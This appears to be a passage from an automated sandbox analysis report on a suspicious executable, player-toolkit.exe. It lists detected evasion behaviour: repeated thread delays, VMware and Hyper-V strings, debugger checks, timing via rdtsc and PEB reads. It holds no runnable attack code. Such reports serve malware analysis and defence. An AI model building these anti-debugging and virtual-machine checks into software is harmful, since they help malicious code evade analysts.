Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 59120 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 59010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58900 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58792 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58683 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58573 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58464 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58353 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58245 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58136 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 58026 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57917 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57807 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57698 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57588 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57479 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57370 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57261 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57151 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 57042 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56933 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56823 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56713 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56604 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56495 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56386 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56276 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56167 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 56057 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 55948 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 55839 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 55729 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 55620 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 55511 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Thread delayed: delay time: 55401 Jump to behavior
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000013.00000000.340891539.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000013.00000000.335555394.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000013.00000000.341444076.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000013.00000002.474023233.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00019A80 rdtsc 2_2_00019A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_02999A00
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_000E6217 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_000E6217
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0001C8D0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary, 29_2_0001C8D0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298D294 mov eax, dword ptr fs:[00000030h] 2_2_0298D294
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298D294 mov eax, dword ptr fs:[00000030h] 2_2_0298D294
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0296AAB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0296AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0296AAB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0298FAB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h] 2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h] 2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h] 2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h] 2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h] 2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h] 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982ACB mov eax, dword ptr fs:[00000030h] 2_2_02982ACB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982AE4 mov eax, dword ptr fs:[00000030h] 2_2_02982AE4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295AA16 mov eax, dword ptr fs:[00000030h] 2_2_0295AA16
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295AA16 mov eax, dword ptr fs:[00000030h] 2_2_0295AA16
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h] 2_2_02955210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02955210 mov ecx, dword ptr fs:[00000030h] 2_2_02955210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h] 2_2_02955210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h] 2_2_02955210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02973A1C mov eax, dword ptr fs:[00000030h] 2_2_02973A1C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02968A0A mov eax, dword ptr fs:[00000030h] 2_2_02968A0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h] 2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h] 2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h] 2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h] 2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h] 2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h] 2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02994A2C mov eax, dword ptr fs:[00000030h] 2_2_02994A2C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02994A2C mov eax, dword ptr fs:[00000030h] 2_2_02994A2C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1AA16 mov eax, dword ptr fs:[00000030h] 2_2_02A1AA16
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1AA16 mov eax, dword ptr fs:[00000030h] 2_2_02A1AA16
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h] 2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A0B260 mov eax, dword ptr fs:[00000030h] 2_2_02A0B260
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A0B260 mov eax, dword ptr fs:[00000030h] 2_2_02A0B260
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A28A62 mov eax, dword ptr fs:[00000030h] 2_2_02A28A62
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029E4257 mov eax, dword ptr fs:[00000030h] 2_2_029E4257
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h] 2_2_02959240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h] 2_2_02959240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h] 2_2_02959240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h] 2_2_02959240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0299927A mov eax, dword ptr fs:[00000030h] 2_2_0299927A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1EA55 mov eax, dword ptr fs:[00000030h] 2_2_02A1EA55
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A25BA5 mov eax, dword ptr fs:[00000030h] 2_2_02A25BA5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298B390 mov eax, dword ptr fs:[00000030h] 2_2_0298B390
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02982397 mov eax, dword ptr fs:[00000030h] 2_2_02982397
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h] 2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h] 2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h] 2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02961B8F mov eax, dword ptr fs:[00000030h] 2_2_02961B8F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02961B8F mov eax, dword ptr fs:[00000030h] 2_2_02961B8F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A0D380 mov ecx, dword ptr fs:[00000030h] 2_2_02A0D380
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1138A mov eax, dword ptr fs:[00000030h] 2_2_02A1138A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h] 2_2_02984BAD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h] 2_2_02984BAD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h] 2_2_02984BAD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A023E3 mov ecx, dword ptr fs:[00000030h] 2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A023E3 mov ecx, dword ptr fs:[00000030h] 2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A023E3 mov eax, dword ptr fs:[00000030h] 2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D53CA mov eax, dword ptr fs:[00000030h] 2_2_029D53CA
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D53CA mov eax, dword ptr fs:[00000030h] 2_2_029D53CA
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h] 2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h] 2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h] 2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h] 2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h] 2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h] 2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0297DBE9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h] 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A1131B mov eax, dword ptr fs:[00000030h] 2_2_02A1131B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295F358 mov eax, dword ptr fs:[00000030h] 2_2_0295F358
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295DB40 mov eax, dword ptr fs:[00000030h] 2_2_0295DB40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02983B7A mov eax, dword ptr fs:[00000030h] 2_2_02983B7A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02983B7A mov eax, dword ptr fs:[00000030h] 2_2_02983B7A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0295DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0295DB60
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02A28B58 mov eax, dword ptr fs:[00000030h] 2_2_02A28B58
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02959080 mov eax, dword ptr fs:[00000030h] 2_2_02959080
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D3884 mov eax, dword ptr fs:[00000030h] 2_2_029D3884
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029D3884 mov eax, dword ptr fs:[00000030h] 2_2_029D3884
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0298F0BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298F0BF mov eax, dword ptr fs:[00000030h] 2_2_0298F0BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0298F0BF mov eax, dword ptr fs:[00000030h] 2_2_0298F0BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029990AF mov eax, dword ptr fs:[00000030h] 2_2_029990AF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h] 2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h] 2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h] 2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h] 2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h] 2_2_029820A0
